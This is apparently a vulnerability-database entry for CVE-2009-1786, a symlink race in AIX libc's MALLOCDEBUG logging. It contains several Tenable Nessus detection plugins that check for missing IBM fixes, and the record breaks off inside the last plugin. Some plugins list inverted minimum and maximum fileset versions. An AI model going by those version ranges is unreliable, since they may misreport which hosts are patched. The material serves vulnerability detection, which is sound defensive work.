ID CVE-2009-1786 Type cve Reporter cve@mitre.org Modified 2017-09-29T01:34:00
Description
The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows local users to create or overwrite arbitrary files via a symlink attack on the log file associated with the MALLOCDEBUG environment variable.
{"nessus": [{"lastseen": "2019-02-21T01:18:23", "bulletinFamily": "scanner", "description": "There is a race condition in the MALLOCDEBUG debugging component of the malloc subsystem in the library libc.a. A local user can exploit this race condition when executing setuid root programs and thereby overwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user to overwrite arbitrary files and execute arbitrary code as the root user.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2013-03-11T00:00:00", "id": "AIX_IZ50445.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64328", "published": "2013-01-30T00:00:00", "title": "AIX 5.3 TL 9 : libc (IZ50445)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libc_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64328);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/03/11 18:51:58 $\");\n\n script_cve_id(\"CVE-2009-1786\");\n\n script_name(english:\"AIX 5.3 TL 9 : libc (IZ50445)\");\n script_summary(english:\"Check for APAR IZ50445\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"5.3\", ml:\"09\", patch:\"IZ50445_09\", package:\"bos.rte.libc\", minfilesetver:\"5.3.9.0\", maxfilesetver:\"5.3.9.2\") < 0) flag++;\nif (aix_check_ifix(release:\"5.3\", ml:\"09\", patch:\"IZ50445_09\", package:\"bos.adt.prof\", minfilesetver:\"5.3.9.0\", maxfilesetver:\"5.3.9.2\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:18:23", "bulletinFamily": "scanner", "description": "There is a race condition in the MALLOCDEBUG debugging component of the malloc subsystem in the library libc.a. A local user can exploit this race condition when executing setuid root programs and thereby overwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user to overwrite arbitrary files and execute arbitrary code as the root user.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2013-03-11T00:00:00", "id": "AIX_IZ50447.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64329", "published": "2013-01-30T00:00:00", "title": "AIX 5.3 TL 8 : libc (IZ50447)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libc_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64329);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/03/11 18:51:58 $\");\n\n script_cve_id(\"CVE-2009-1786\");\n\n script_name(english:\"AIX 5.3 TL 8 : libc (IZ50447)\");\n script_summary(english:\"Check for APAR IZ50447\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"5.3\", ml:\"08\", patch:\"IZ50447_08\", package:\"bos.rte.libc\", minfilesetver:\"5.3.8.0\", maxfilesetver:\"5.3.8.5\") < 0) flag++;\nif (aix_check_ifix(release:\"5.3\", ml:\"08\", patch:\"IZ50447_08\", package:\"bos.adt.prof\", minfilesetver:\"5.3.8.0\", maxfilesetver:\"5.3.8.5\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:18:23", "bulletinFamily": "scanner", "description": "There is a race condition in the MALLOCDEBUG debugging component of the malloc subsystem in the library libc.a. A local user can exploit this race condition when executing setuid root programs and thereby overwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user to overwrite arbitrary files and execute arbitrary code as the root user.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2013-03-11T00:00:00", "id": "AIX_IZ50517.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64331", "published": "2013-01-30T00:00:00", "title": "AIX 5.3 TL 7 : libc (IZ50517)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libc_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64331);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/03/11 18:51:58 $\");\n\n script_cve_id(\"CVE-2009-1786\");\n\n script_name(english:\"AIX 5.3 TL 7 : libc (IZ50517)\");\n script_summary(english:\"Check for APAR IZ50517\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"5.3\", ml:\"07\", patch:\"IZ50517_07\", package:\"bos.rte.libc\", minfilesetver:\"5.3.7.0\", maxfilesetver:\"5.3.7.8\") < 0) flag++;\nif (aix_check_ifix(release:\"5.3\", ml:\"07\", patch:\"IZ50517_07\", package:\"bos.adt.prof\", minfilesetver:\"5.3.7.0\", maxfilesetver:\"5.3.7.8\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:18:23", "bulletinFamily": "scanner", "description": "There is a race condition in the MALLOCDEBUG debugging component of the malloc subsystem in the library libc.a. A local user can exploit this race condition when executing setuid root programs and thereby overwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user to overwrite arbitrary files and execute arbitrary code as the root user.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2013-03-11T00:00:00", "id": "AIX_IZ50500.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64330", "published": "2013-01-30T00:00:00", "title": "AIX 5.3 TL 0 : libc (IZ50500)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libc_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64330);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/03/11 18:51:58 $\");\n\n script_cve_id(\"CVE-2009-1786\");\n\n script_name(english:\"AIX 5.3 TL 0 : libc (IZ50500)\");\n script_summary(english:\"Check for APAR IZ50500\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"5.3\", ml:\"00\", patch:\"IZ50500_06\", package:\"bos.rte.libc\", minfilesetver:\"5.3.0.0\", maxfilesetver:\"5.3.0.71\") < 0) flag++;\nif (aix_check_ifix(release:\"5.3\", ml:\"00\", patch:\"IZ50500_06\", package:\"bos.adt.prof\", minfilesetver:\"5.3.0.0\", maxfilesetver:\"5.3.0.71\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:18:23", "bulletinFamily": "scanner", "description": "There is a race condition in the MALLOCDEBUG debugging component of the malloc subsystem in the library libc.a. A local user can exploit this race condition when executing setuid root programs and thereby overwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user to overwrite arbitrary files and execute arbitrary code as the root user.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2013-03-11T00:00:00", "id": "AIX_IZ50129.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64326", "published": "2013-01-30T00:00:00", "title": "AIX 6.1 TL 1 : libc (IZ50129)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libc_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64326);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/03/11 18:51:58 $\");\n\n script_cve_id(\"CVE-2009-1786\");\n\n script_name(english:\"AIX 6.1 TL 1 : libc (IZ50129)\");\n script_summary(english:\"Check for APAR IZ50129\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"01\", patch:\"IZ50129_01\", package:\"bos.rte.libc\", minfilesetver:\"6.1.1.0\", maxfilesetver:\"6.1.0.4\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"01\", patch:\"IZ50129_01\", package:\"bos.adt.prof\", minfilesetver:\"6.1.1.0\", maxfilesetver:\"6.1.0.4\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:18:23", "bulletinFamily": "scanner", "description": "There is a race condition in the MALLOCDEBUG debugging component of the malloc subsystem in the library libc.a. A local user can exploit this race condition when executing setuid root programs and thereby overwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user to overwrite arbitrary files and execute arbitrary code as the root user.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2013-03-11T00:00:00", "id": "AIX_IZ50139.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64327", "published": "2013-01-30T00:00:00", "title": "AIX 6.1 TL 0 : libc (IZ50139)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libc_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64327);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/03/11 18:51:58 $\");\n\n script_cve_id(\"CVE-2009-1786\");\n\n script_name(english:\"AIX 6.1 TL 0 : libc (IZ50139)\");\n script_summary(english:\"Check for APAR IZ50139\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ50139_00\", package:\"bos.rte.libc\", minfilesetver:\"6.1.0.0\", maxfilesetver:\"6.1.0.9\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ50139_00\", package:\"bos.rte.libc\", minfilesetver:\"6.1.1.0\", maxfilesetver:\"6.1.0.4\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ50139_00\", package:\"bos.rte.libc\", minfilesetver:\"6.1.2.0\", maxfilesetver:\"6.1.0.3\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ50139_00\", package:\"bos.adt.prof\", minfilesetver:\"6.1.0.0\", maxfilesetver:\"6.1.0.9\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ50139_00\", package:\"bos.adt.prof\", minfilesetver:\"6.1.1.0\", maxfilesetver:\"6.1.0.4\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"00\", patch:\"IZ50139_00\", package:\"bos.adt.prof\", minfilesetver:\"6.1.2.0\", maxfilesetver:\"6.1.0.3\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:18:23", "bulletinFamily": "scanner", "description": "There is a race condition in the MALLOCDEBUG debugging component of the malloc subsystem in the library libc.a. A local user can exploit this race condition when executing setuid root programs and thereby overwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user to overwrite arbitrary files and execute arbitrary code as the root user.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2013-03-11T00:00:00", "id": "AIX_IZ50121.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64325", "published": "2013-01-30T00:00:00", "title": "AIX 6.1 TL 2 : libc (IZ50121)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libc_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64325);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/03/11 18:51:58 $\");\n\n script_cve_id(\"CVE-2009-1786\");\n\n script_name(english:\"AIX 6.1 TL 2 : libc (IZ50121)\");\n script_summary(english:\"Check for APAR IZ50121\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", 